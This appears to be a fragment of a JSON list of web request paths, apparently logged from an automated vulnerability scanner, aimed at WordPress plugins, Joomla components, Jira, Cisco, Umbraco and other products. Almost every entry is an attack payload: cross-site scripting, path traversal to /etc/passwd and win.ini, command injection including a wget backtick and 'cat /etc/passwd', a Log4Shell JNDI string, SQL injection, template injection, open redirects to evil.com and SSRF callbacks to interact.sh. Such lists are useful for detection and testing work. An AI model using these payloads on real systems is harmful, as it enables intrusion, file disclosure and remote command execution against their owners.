"/storia_soldi.php?piu17%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3Ee3esq=1",
"/index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00",
"/cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=%60wget",
"/index.php?redirect=/%5C/evil.com/",
"/mantis/verify.php?id=1&confirm_hash=",
"/tweb/ft.php?u=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/dolibarr/adherents/cartes/carte.php?&mode=cardlogin&foruserlogin=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&model=5160&optioncss=print",
"/?rest_route=/wp/v2/users/",
"/manage/webshell/u?s=5&w=218&h=15&k=service%0Assh%0Adisable%0A&l=62&_=5621298674064",
"/admin/user.php",
"/public/css/2A6ShoUMkrPr835vB3Y6Pz5JRjc.css",
"/wp-json/anycomment/v1/auth/wordpress?redirect=https://example.com",
"/assets/backend/elfinder/elfinder-cke.html",
"/index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../etc/passwd%00",
"/admingui/version/serverTasksGeneral?serverTasksGeneral.GeneralWebserverTabs.TabHref=2",
"/wp-admin/admin.php?page=wpo_wcpdf_options_page&section=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert(document.domain)+x%3D",
"/manage/log/view?filename=/windows/win.ini&base=../../../../../../../../../../",
"/clients/editclient.php?id=2A6ShoHQnIEl1tlLYe2IMZGm5uV&action=update",
"/uir//etc/passwd",
"/pages/systemcall.php?command=cat%20/etc/passwd",
"/Umbraco/feedproxy.aspx?url=http://cadgqm02toabu64p21o0ckoqnqeyc56p1.interact.sh",
"/secure/ContactAdministrators!default.jspa",
"/wp-admin/admin.php?page=my-sticky-elements-leads&search-contact=xxxx%22%3E%3Cimg+src+onerror%3Dalert(%60document.domain%60)+x",
"/?x=$%7Bjndi:ldap://127.0.0.1",
"/index.php?option=comgmapfp&controller=editlieux&tmpl=component&task=upload_image",
"/cs/Satellite?pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/complexassetmaker&cs_imagedir=qqq%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E",
"/actions/seomatic/meta-container/all-meta-containers?uri=%7B%7B228*'98'%7D%7D",
"/wp-admin/admin-ajax.php?action=heartbeat&admin_custom_language_toggle=1&admin_custom_language_return_url=https://example.com",
"/wp-content/plugins/marmoset-viewer/mviewer.php?id=http://%3C/script%3E%3Csvg/onload=alert('2A6ShpKRDoAFXOqCqSec1USMLKq')%3E",
"/glpi/plugins/barcode/front/send.php?file=../../../../../../../../etc/passwd",
"/s/2A6ShsMcDmQV0cd8gIXvtJEjHtx/_/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml",
"/+CSCOT+/translation-table?type=mst&textdomain=/%2BCSCOE%2B/portal_inc.lua&default-language&lang=../",
"/login.action",
"/webmail/old/calendar/minimizer/index.php?script=...%2F.%2F...%2F.%2F...%2F.%2F...%2F.%2F...%2F.%2F...%2F.%2F...%2F.%2F...%2F.%2F...%2F.%2F...%2F.%2Fetc%2Fpasswd",
"/GponForm/diag_Form?images/",
"/index.php?m=user&c=Users&a=logout&referurl=https://example.com",
"/admin/?n=language&c=language_general&a=doSearchParameter&editor=cn&word=search&appno=0+union+select+98989*443131,1--+&site=admin",
"/cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences",
"/changePassword?username=administrator",
"/wp-content/plugins/profile-builder/assets/misc/fallback-page.php?site_url=javascript:alert(document.domain);&message=Not+Found&site_name=404",
"/PolicyMgmt/policyDetailsCard.do?poID=19&typeID=3&prodID='%22%3E%3Csvg%2Fonload%3Dalert(document.domain)%3E",
"/?q=user%2Flogin",
"/casa/nodes/thumbprints",
"/index.php/component/chronoforums2/profiles/avatar/u1?tvout=file&av=../../../../../../../etc/passwd",
"/ws_utc/resources/setting/keystore",
"/osclass/oc-admin/index.php?page=appearance&action=render&file=../../../../../../../../../../etc/passwd",
"/cgi-bin/system_log.cgi",
"/module/?module=admin%2Fmodules%2Fmanage&id=test%22+onmousemove%3Dalert(document.domain)+xx=%22test&from_url=x",
"/logos_clients/1.php",
"/opensis/index.php",
"/email_passthrough.php?email_ID=1&type=link&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Fexample.com",
"/admin/data/autosuggest-remote.php?q=%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E",
"/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php?source=1&ver=1%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/auth_changepassword.php?ref=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/tarantella/cgi-bin/secure/ttawlogin.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd",
"/..%2F..%2F..%2F..%2F..%2F../etc/passwd",
"/example.com",
"/php/passport/index.php?action=manage&mtype=userset&backurl=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/BSW_cxttongr.htm",
"/index.php?option=com_ultimateportfolio&controller=../../../../../../../../../../etc/passwd%00",
"/fmangersub?cpath=../../../../../../../etc/passwd",
"/_vti_inf.html",
"/user.action",
"/2A6ShpqNoYB8uIkSVBRkdp4WITD.jsp",
"/wp-content/plugins/sourceafrica/js/window.php?wpbase=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/wp-content/plugins/indexisto/assets/js/indexisto-inject.php?indexisto_index=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/meaweb/os/mxperson",
"/composer/send_email?to=xyUD@xyUD&url=http://cadgqm02toabu64p21o0ckxh5eoyjnexy.interact.sh"
]